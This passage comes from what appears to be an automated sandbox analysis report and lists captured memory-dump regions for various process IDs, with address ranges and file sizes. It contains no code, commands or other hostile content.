                                                                                                                            448KB

                                                                                                                          • memory/492-206-0x0000023124B20000-0x0000023124B6B000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            300KB

                                                                                                                          • memory/492-243-0x0000023127400000-0x0000023127501000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            1.0MB

                                                                                                                          • memory/492-200-0x00007FF7AA864060-mapping.dmp
                                                                                                                          • memory/492-207-0x0000023124E40000-0x0000023124EB0000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            448KB

                                                                                                                          • memory/936-231-0x0000000000990000-0x0000000000992000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            8KB

                                                                                                                          • memory/936-218-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/1004-149-0x0000021FCB6A0000-0x0000021FCB710000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            448KB

                                                                                                                          • memory/1004-323-0x0000021FCB780000-0x0000021FCB7F0000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            448KB

                                                                                                                          • memory/1004-322-0x0000021FCB630000-0x0000021FCB67B000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            300KB

                                                                                                                          • memory/1032-359-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/1096-143-0x0000029F00770000-0x0000029F007E0000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            448KB

                                                                                                                          • memory/1180-168-0x0000026034FB0000-0x0000026035020000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            448KB

                                                                                                                          • memory/1376-177-0x000002AD6F400000-0x000002AD6F470000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            448KB

                                                                                                                          • memory/1428-155-0x000001F56A200000-0x000001F56A270000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            448KB

                                                                                                                          • memory/1908-161-0x000001430C400000-0x000001430C470000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            448KB

                                                                                                                          • memory/2208-191-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/2208-327-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/2208-193-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            172KB

                                                                                                                          • memory/2244-242-0x00000000026C5000-0x00000000026C7000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            8KB

                                                                                                                          • memory/2244-219-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/2244-226-0x00000000026C0000-0x00000000026C2000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            8KB

                                                                                                                          • memory/2244-241-0x00000000026C4000-0x00000000026C5000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/2244-239-0x00000000026C2000-0x00000000026C4000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            8KB

                                                                                                                          • memory/2284-209-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/2284-211-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            88KB

                                                                                                                          • memory/2292-195-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/2292-199-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/2552-336-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/2576-334-0x00000154C8740000-0x00000154C87B0000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            448KB

                                                                                                                          • memory/2576-138-0x00000154C7CD0000-0x00000154C7D40000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            448KB

                                                                                                                          • memory/2576-137-0x00000154C7C10000-0x00000154C7C5B000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            300KB

                                                                                                                          • memory/2608-331-0x000002209BB00000-0x000002209BB70000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            448KB

                                                                                                                          • memory/2608-169-0x000002209B490000-0x000002209B500000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            448KB

                                                                                                                          • memory/2756-159-0x0000028AEBFA0000-0x0000028AEC010000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            448KB

                                                                                                                          • memory/2756-325-0x0000028AEC540000-0x0000028AEC5B0000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            448KB

                                                                                                                          • memory/2836-181-0x000001B333A40000-0x000001B333AB0000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            448KB

                                                                                                                          • memory/2852-179-0x000001D2CBB40000-0x000001D2CBBB0000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            448KB

                                                                                                                          • memory/2884-358-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/2956-190-0x000000001B2E0000-0x000000001B2E2000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            8KB

                                                                                                                          • memory/2956-182-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/2956-188-0x0000000000EA0000-0x0000000000EBC000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            112KB

                                                                                                                          • memory/2956-185-0x0000000000680000-0x0000000000681000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/2956-189-0x0000000000EC0000-0x0000000000EC1000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/2956-187-0x0000000000E90000-0x0000000000E91000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/3048-216-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/3048-213-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/3160-355-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/3184-291-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/3828-116-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/3832-208-0x0000000001490000-0x0000000001492000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            8KB

                                                                                                                          • memory/3832-203-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/3972-125-0x00007FF7AA864060-mapping.dmp
                                                                                                                          • memory/3972-160-0x000001E5CBDD0000-0x000001E5CBE40000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            448KB

                                                                                                                          • memory/4132-238-0x0000000002CA2000-0x0000000002CA4000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            8KB

                                                                                                                          • memory/4132-244-0x0000000002CA5000-0x0000000002CA6000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/4132-230-0x0000000002CA0000-0x0000000002CA2000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            8KB

                                                                                                                          • memory/4132-225-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/4212-232-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/4212-235-0x0000000000BD0000-0x0000000000BDD000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            52KB

                                                                                                                          • memory/4432-340-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/4748-246-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/4820-360-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/4832-369-0x0000000000402F68-mapping.dmp
                                                                                                                          • memory/4836-329-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/4920-365-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/4932-361-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/4936-272-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5116-292-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5140-366-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5260-339-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5312-367-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5312-295-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5324-349-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5416-350-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5424-368-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5428-343-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5648-345-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5696-249-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5696-256-0x0000000003570000-0x0000000003580000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            64KB

                                                                                                                          • memory/5696-262-0x00000000037B0000-0x00000000037C0000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            64KB

                                                                                                                          • memory/5712-352-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5804-302-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5840-354-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/5944-346-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/6068-247-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/6260-344-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/6280-306-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/6320-363-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/6344-364-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/6360-274-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/6396-275-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/6396-300-0x0000000000824000-0x0000000000825000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/6396-283-0x0000000000820000-0x0000000000822000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            8KB

                                                                                                                          • memory/6404-353-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/6468-313-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/6468-320-0x0000000000C9C000-0x0000000000D9D000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            1.0MB

                                                                                                                          • memory/6468-321-0x00000000011C0000-0x000000000121C000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            368KB

                                                                                                                          • memory/6556-362-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/6604-309-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/6692-348-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/6732-285-0x00000000008B0000-0x00000000008C2000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            72KB

                                                                                                                          • memory/6732-278-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/6732-284-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            64KB

                                                                                                                          • memory/6772-347-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/6776-351-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/6792-357-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/6808-312-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/6832-286-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/6844-356-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/6904-317-0x0000000000000000-mapping.dmp
                                                                                                                          • memory/7024-282-0x0000000000000000-mapping.dmp